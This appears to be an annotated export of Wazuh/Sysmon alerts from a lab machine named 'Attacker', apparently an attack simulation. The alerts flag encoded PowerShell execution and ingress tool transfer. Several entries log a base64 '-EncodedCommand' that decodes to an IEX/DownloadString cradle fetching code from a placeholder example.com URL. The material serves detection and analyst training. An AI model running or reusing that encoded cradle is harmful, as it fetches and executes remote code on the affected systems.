data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 65 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534277.1517908 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:55.3537134Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284144 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:55.314
ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00}
ProcessId: 5944
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1
CreationUtcTime: 2025-04-24 22:37:55.314
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:55.314 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd42-680a-5b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:55.314 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 62 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534280.1520673 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:58.3360432Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284163 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:56.657
ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00}
ProcessId: 5188
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00}
ParentProcessId: 5944
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:56.657 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd44-680a-5d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 66 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534281.1528736 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:58.5451085Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284164 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:58.543
ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00}
ProcessId: 5188
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tsd2bll.s43.ps1
CreationUtcTime: 2025-04-24 22:37:58.543
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:58.543 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd44-680a-5d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tsd2bll.s43.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:58.543 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 63 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534283.1531501 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:00.8075389Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284198 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:59.419
ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00}
ProcessId: 15132
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00}
ParentProcessId: 5188
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:59.419 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd47-680a-610b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 67 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534283.1539568 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:01.2115486Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284199 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
